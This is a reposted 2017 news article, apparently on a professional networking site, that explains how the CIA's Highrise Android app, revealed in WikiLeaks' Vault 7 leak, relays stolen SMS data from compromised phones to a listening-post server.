How CIA Highrise Project Works: Agents Covertly Steal Data From Hacked Smartphones (Without Internet)

Fernando A. Cabal Fernando A. Cabal

Fernando A. Cabal

Updating...

发布日期: 2017年7月26日
+ 关注

Explained: How CIA Highrise Project Works

WikiLeaks did publish a couple of weeks ago the 16th batch of its ongoing Vault 7 leak (The CIA tool box used for hacking), this time instead of revealing new malware or hacking tool, the whistleblower organisation has unveiled how CIA operatives stealthy collect and forward stolen data from compromised smartphones.

Previously there have been reports about several CIA hacking tools, malware and implants used by the agency to remotely infiltrate and steal data from the targeted systems or smartphones.

However, this time neither Wikileaks nor the leaked CIA manual clearly explains how the agency operatives were using this tool.

In general, the malware uses the internet connection to send stolen data after compromising a machine to the attacker-controlled server (listening posts), but in the case of smartphones, malware has an alternative way to send stolen data to the attackers i.e. via SMS.

But for collecting stolen data via SMS, one has to deal with a major issue – to sort and analyse bulk messages received from multiple targeted devices.

To solve this issue, the CIA created a simple Android application, dubbed Highrise, which works as an SMS proxy between the compromised devices and the listening post server.

 the manual is that CIA operatives need to install an application called "TideCheck" on their Android devices, which are set to receive all the stolen data via SMS from the compromised devices.

Last known version of the TideCheck app, i.e. HighRise v2.0, was developed in 2013 and works on mobile devices running Android 4.0 to 4.3, by now, they should have already developed an updated versions that work for the latest Android OS.

Once installed, the app prompts for a password, which is "inshallah," and after login, it displays three options:

  • Initialize — to run the service.
  • Show/Edit configuration — to configure basic settings, including the listening post server URL, which must be using HTTPS.
  • Send Message — allows CIA operative to manually (optional) submit short messages (remarks) to the listening post server.

Once initialized and configured properly, the app continuously runs in the background to monitor incoming messages from compromised devices; and when received, forwards every single message to the CIA's listening post server over a TLS/SSL secured Internet communication channel.


Reference: https://thehackernews.com/2017/07/cia-smartphone-hacking-tool.html



要查看或添加评论,请登录

Fernando A. Cabal的更多文章

社区洞察

其他会员也浏览了